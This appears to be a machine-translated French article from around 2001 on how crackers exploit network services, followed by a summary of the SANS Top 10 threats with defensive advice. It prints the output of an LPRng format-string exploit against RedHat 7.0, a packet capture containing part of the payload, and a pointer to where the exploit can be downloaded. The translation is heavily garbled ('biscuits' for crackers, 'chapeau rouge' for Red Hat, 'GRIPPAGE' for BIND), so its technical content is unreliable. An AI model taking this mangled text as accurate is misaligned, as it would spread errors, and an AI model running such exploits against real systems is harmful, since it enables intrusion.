En cet article, nous couvrirons les exploits courues par des biscuits. Nous regarderons également le SANS de liste critique de 10 la plupart d'Internet menaces de sécurité.
La reconnaissance est essentielle en figurant hors de ce qui est ouvert et de ce qui est fermé. La prochaine étape pour un biscuit est de se casser réellement dedans à un réseau informatique. Les biscuits font ceci en exploitant des faiblesses dans des services de logiciels d'exploitation.
Il y a beaucoup d'exploits dehors là ; la conclusion de la bonne exploit peut être un mal de tête. Non toutes les exploits sont égale créée. Par ceci, je veux dire que la plupart des exploits sont personne à charge de logiciel d'exploitation. Juste parce qu'il y a exploit d'imprimante ligne par ligne pour Linux ne signifie pas qu'il travaillerait à Solaris, et vice versa.
Pour aider à expliquer ce qu'est et regarde une exploit comme quand elle est exécutée, j'ai inclus en cet article le rendement d'une exploit et quelques paquets ont impliqué dans l'exploit. D'abord, un peu de fond sur l'exploit que j'ai décidé de courir. Vers la fin de 2000, activité de sondage accrue sur le port 515 (port d'imprimante ligne par ligne). Ceci a été lié à une exploit dans rouge démon chapeau 7.0 d'imprimante ligne par ligne. À l'heure de cette écriture, je vois toujours beaucoup de sondes pour ce service sur mon mur à l'épreuve du feu.
|
|
Si vous voulez voir l'exploit que j'ai employée, il peut trouver à http://www.netcat.it.
Voici les listes promises avec un certain jeu par le jeu pour chacun :
exploit à distance de +++ www.netcat.it pour LPRng/lpd
l'information d'exploit de +++
victime de +++ : 192.168.1.25
type de +++ : 0 - RedHat 7.0 - Guinesss
adresse de +++ Eip : 0xbffff3ec
adresse de +++ Shellcode : 0xbffff7f2
position de +++ : 300
alignement de +++ : 2
excentrage 0 de +++
+++ attaquant 192.168.1.25 avec de la notre corde de format
l'homme de force brutale de +++, détendent et apprécient le tour ; >
De ce rendement, nous savons que l'exploit attaque imprimante ligne par ligne rouge (type 0-RedHat7.0 - Guinesess) chapeau 7.0. Voulez voir comment le tcpdump regarde cette attaque ?
18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer : Victoire de S 4221747912:4221747912(0)
32120 < mss 1460, sackOK, horodateur 4058996 0, nop, wscale 0 > (DF) (TTL 64, identification 11263)
4500 003c 2bff 4000 4006 8b4e c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000
a002 7d78 8bb1 0000 0204 05b4 0402 080a
003d ef74 0000 0000 0103 0300
18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894 : S 397480959:397480959(0) ACK
4221747913 victoire 32120 < mss 1460, sackOK, horodateur 393475 4058996, nop, wscale 0 > (DF) (TTL 64,
identification 3278)
4500 003c 0cce 4000 4006 aa7f c0a8 0119
c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9
a012 7d78 5ee7 0000 0204 05b4 0402 080a
0006 0103 003d ef74 0103 0300
18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer : . 1:1(0) victoire 32120 de ACK 1 < nop,
nop, horodateur 4058996 393475> (DF) (TTL 64, identification 11264)
4500 0034 2c00 4000 4006 8b55 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400
8010 7d78 8dac 0000 0101 080a 003d ef74
0006 0103
18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894 : Victoire 32120 de P 1:31(30) ACK 1
< nop, nop, horodateur 393476 4058996 > (DF) (TTL 64, identification 3279)
4500 0052 0ccf 4000 4006 aa68 c0a8 0119
c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9
8018 7d78 3e5b 0000 0101 080a 0006 0104
003d ef74 6c70 643a 203a 204d 616c 666f
726d 6564 2066 726f 6d20 6164 6472 6573
730a
18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer : . 1:1(0) victoire 32120 de ACK 31 < nop,
nop, horodateur 4058997 393476> (DF) (TTL 64, identification 11265)
4500 0034 2c01 4000 4006 8b54 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e
8010 7d78 8d8c 0000 0101 080a 003d ef75
0006 0104
18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894 : Victoire 32120 de F 31:31(0) ACK 1
< nop, nop, horodateur 393476 4058997 > (DF) (TTL 64, identification 3280)
4500 0034 0cd0 4000 4006 aa85 c0a8 0119
c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9
8011 7d78 8d8b 0000 0101 080a 0006 0104
003d ef75
18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer : . 1:1(0) victoire 32120 de ACK 32 < nop,
nop, horodateur 4058997 393476> (DF) (TTL 64, identification 11266)
4500 0034 2c02 4000 4006 8b53 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8010 7d78 8d8b 0000 0101 080a 003d ef75
0006 0104
18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer : Victoire 32120 de P 1:424(423) ACK 32
< nop, nop, horodateur 4059002 393476 > (DF) (TTL 64, identification 11267)
4500 01db 2c03 4000 4006 89ab c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8018 7d78 54c5 0000 0101 080a 003d ef7a
0006 0104 4242 ffbf f2ff du ffbf f1ff de f0ff
ffbf 5858 du ffbf f3ff 5858 5858 5858 5858
5858 5858 5858 5858 252e 3137 3675 2533
3030 246e 252e 3133 7525 3330 3124 6e25
2e32 3533 7525 3330 3224 6e25 2e31 3932
Regardons ce qui se produit ici. D'abord, nous voyons 192.168.1.5 et 192.168.1.25 essayant d'établir un rapport en utilisant le TCP poignée de main à trois voies typique. Dans la prochaine séquence d'opérations, nous voyons 192.168.1.5 essayer de courir l'exploit contre 192.168.1.25. En conclusion, nous voyons les 192.168.1.5 pousser 423 bytes de données à 192.168.1.25. L'exploit continue ceci pendant un moment jusqu'à ce que ce soit brute-force capable l'exploit.
Quand cette exploit a fonctionné, 192.168.1.25 équipés me de coquille (pas que j'ai eu besoin d'elle), et moi pourrions faire ce que jamais j'ai voulu.
Les exploits sont la manière que les biscuits se cassent en systèmes. Pour se protéger contre elles, vous devrez mettre à jour votre logiciel d'exploitation avec des pièces rapportées. (ceci va pour tous les systèmes.)
Les menaces de sécurité d'Internet les plus critiques du principal 10 de SANS est une liste des exploits les plus communes trouvées sur des réseaux informatiques. Ce qui fait cette liste ainsi l'objet de valeur est le fait que la sécurité de réseau d'administration de système de groupe fournit une liste des entrées relatives de CVE (des vulnérabilités et des expositions communes), de sorte qu'une personne puisse faire plus de recherche au besoin. Cette liste a été compilée par SANS avec l'aide de beaucoup d'experts en matière de sécurité et de la communauté de sécurité.
La base de données de CVE peut être trouvée à http://www.cve.mitre.org/.
Pour lire plus sur le principal 10 de SANS, visitez http://www.sans.org/topten.htm.
La première exploit énumérée sur les 10 principaux est GRIPPAGE. Le GRIPPAGE est un programme utilisé pour des serveurs de DNS (pour aider à résoudre des noms aux adresses) et est employé dans tout l'Internet. En dernières années de couples, des trous principaux ont été trouvés dans beaucoup de versions de GRIPPAGE. Il est essentiel pour n'importe qui qui court le GRIPPAGE pour continuer toujours sur les dernières vulnérabilités. Janv. 29, 2001, associés de réseau incorporés a annoncé qu'il a découvert plus de vulnérabilités concernant la version 4 de GRIPPAGE et la version 8 de GRIPPAGE. Des pièces rapportées ont été libérées et peuvent être téléchargées de l'emplacement du Web de votre fournisseur de logiciel d'exploitation.
Si vous voudriez lire le papier libéré par NAI, vous pouvez l'obtenir ici : http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel=900 ou vous peut lire le bulletin de renseignements de CERT à http://www.cert.org/bulletin de renseignements/CA-2001-02.html.
La deuxième exploit dans le principal 10 de SANS est des programmes vulnérables de cgi. C'ont été autour pendant des années et sont la raison principale de la plupart des emplacements de Web d'entaille qui suscitent l'attention traditionnelle.
Plusieurs de ces programmes de CGI-BIN laissent les programmes d'échantillon après installation qui sont vulnérables et permettent à un utilisateur malveillant d'obtenir l'accès d'"racine". Quand un attaquant obtient ce niveau de l'accès, il peut faire pendant qu'il satisfait (incluez changer l'emplacement de Web). J'ai fourni quelques liens pour obtenir plus d'information sur des attaques de CGI-BIN. Cette liste n'est pas complète ; veuillez creuser plus loin si vous pensez que vous êtes vulnérable.
Plus d'information peut être trouvée sur des attaques de CGI-BIN à partir de http://www.cert.org/bulletin de renseignements/CA-1997-24.html, de http://www.cert.org/bulletin de renseignements/CA-1996-11.html, ou de http://www.cert.org/bulletin de renseignements/CA-1997-07.html.
La troisième exploit est des appels à distance vulnérables de procédé (RPCs). RPCs permettent à des programmes C De faire le procédé invite d'autres machines à travers le réseau. La plupart des fournisseurs fournissent des pièces rapportées à l'aide serrent en bas des services de RPC. Néanmoins, la meilleure politique concernant ce service est, si vous n'avez pas besoin de lui, puis le tue. Vous pouvez courir picoseconde-ef|le RPC de grep, trouvent l'identification de processus (PID), et puis courent le 9 PID de mise à mort. Vous pouvez également neutraliser des services de RPC au début sur la plupart des logiciels d'exploitation d'UNIX en changeant le dossier de démarrage (situé à /etc/rc.d/) d'un S (commencez vers le haut) en K (mise à mort). Vous pouvez découvrir ce que les programmes de RPC courent en employant le p de rpcinfo.
Plus d'information peut être trouvée sur des attaques de RPC à partir de http://www.cert.org/incident_notes/IN-99-04.html.
La quatrième exploit sur la liste du principal 10 de SANS est les trous à distance vulnérables de sécurité de service de données dans IIS. (pour être honnête, je suis étonné que Microsoft n'a pas plus de vulnérabilités dans les 10 principaux.) Je peux résumer traiter cette exploit vraiment rapide. Raccordez votre IIS.
Plus d'information peut être trouvée sur des trous de sécurité de RDS de http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.
La cinquième exploit est sendmail vulnérable et attaques de MIME. Ces vulnérabilités sont liées aux débordements d'amortisseur comme les attaques de pipe qui permettent le compromis immédiat de racine. Il y a des couples des manières de fixer ces domaines problématiques. Le premier doit maintenir les pièces rapportées correctes pour vos serveurs de sendmail/mail. Si vous n'avez pas besoin de courir non plus de ces services, vous pouvez les neutraliser (suivez les mêmes procédures que définies pour le RPC).
Plus d'information peut être trouvée sur des trous de sécurité de sendmail de http://www.cert.org/bulletin de renseignements/CA-97.05.sendmail.html.
La sixième exploit est sadmind et mountd vulnérables. Cette vulnérabilité applique aux machines de Linux aussi bien que des machines de Solaris.
Pour plus d'information sur des trous de sécurité de sadmind et de mountd, la visite http://www.cert.org/bulletin de renseignements/CA-99-16-sadmind.html ou le http://www.cert.org/bulletin de renseignements/CA-1998.12.mountd.html.
La septième exploit dans les 10 principaux est dossier global partageant, en utilisant des ports de NetBIOS 135.139). C'est les plus grands utilisateurs de problème de sécurité ont probablement s'ils sont reliés à un modem câblé ou à un DSL. Les la plupart ne comprennent pas le concept du dossier partageant et ne laissent pas le partage de dossier permis. Un autre problème est Napster. Bien que Napster ne soit pas énuméré ici, il exige des personnes de partager des annuaires et cela peut mener à partager puis nécessaire. Comment le corrigeons-nous ? Ces suggestions sont de l'emplacement http://www.sans.org/topten.htm de SANS:
A. En partageant les commandes montées, assurez seulement les annuaires requis sont partagés.
B. Pour la sécurité supplémentaire, laissez partager seulement aux adresses spécifiques d'IP parce que des noms de DNS peuvent être charriés.
C. Pour des systèmes de Windows, assurez toutes les parts sont protégés avec des mots de passe forts.
D. Pour des systèmes de Windows NT, empêchez l'énumération anonyme des utilisateurs, des groupes, de la configuration de système et des clefs d'enregistrement par l'intermédiaire du raccordement "de session nulle".
Bloquez les raccordements d'arrivée au service de session de NetBIOS (tcp 139) au couteau ou au centre serveur de NT. Considérez mettre en application la clef d'enregistrement de RestrictAnonymous pour les centres serveurs Internet-reliés dans les environnements autonomes ou non-faits confiance de domaine.
La huitième exploit est des mots de passe faibles. Parole du besoin I plus ? Sous n'importe quelle forme de évaluation des risques, une des vulnérabilités les plus communes que je vois est des mots de passe faibles. En proposant un mot de passe, rappelez-vous de suivre ces directives simples :
- assurez-vous que le mot de passe est huit caractères de longueur.
- assurez-vous que le mot de passe est une combinaison des nombres, des caractères spéciaux, et des caractères alphanumériques.
- sélectionnez un mot de passe qui n'est pas dans le dictionnaire.
Pour plus d'information sur des forces de mot de passe, visitez http://www.cert.org/tech_tips/passwd_file_protection.html.
La neuvième exploit est des vulnérabilités de débordement d'amortisseur d'IMAP et de BRUIT ou configuration incorrecte. Encore, la meilleure manière de se fixer de ces attaques est de neutraliser le service si vous n'avez pas besoin de lui. En outre, appliquez les dernières pièces rapportées (si vous devez courir le service).
Pour plus d'information sur la sécurité d'IMAP et de BRUIT visitez svp http://www.cert.org/bulletin de renseignements/CA-1998.09.imapd.html, http://www.cert.org/bulletin de renseignements/CA-1998.08.qpopper_vul.html, ou http://www.cert.org/bulletin de renseignements/CA-1997.09.imap_pop.html.
L'exploit finale dans le principal 10 de SANS est des cordes de la communauté de SNMP de défaut réglées au "public" et "privées". Avec les mots de passe faibles, cette vulnérabilité peut être commandée par l'administration de base.
Pour plus d'information sur des cordes de SNMP et de communauté, voir le http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315.
Maintenez dans l'esprit que ce ne sont pas les seules vulnérabilités sur le Web. Un biscuit peut employer n'importe quelle exploit qu'il a dans son sac des tours contre vous et votre réseau.
Online: 478 users browsing the articles directory
|
|